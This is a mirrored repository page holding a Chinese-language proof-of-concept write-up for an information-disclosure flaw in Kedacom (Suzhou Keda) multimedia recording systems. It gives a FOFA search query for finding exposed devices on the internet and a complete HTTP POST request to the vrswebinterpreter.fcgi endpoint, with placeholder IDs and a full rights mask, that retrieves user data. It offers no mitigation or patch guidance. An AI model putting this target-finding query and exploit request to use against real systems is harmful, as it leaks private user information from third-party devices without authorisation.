crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

35 lines
1.4 KiB
Markdown
Raw Permalink Blame History

# 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞
# 一、漏洞简介
苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞
# 二、影响版本
多媒体录播系统
# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
+ fofa`body="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"`
+ 特征
![1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png](./img/VGSRQytOV8lBTDzI/1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65-330998.png)
# 四、漏洞复现
```plain
POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 333
{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}
```
![1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png](./img/VGSRQytOV8lBTDzI/1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1-754019.png)
> 更新: 2024-11-27 10:00:05
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl>
Reference in New Issue View Git Blame Copy Permalink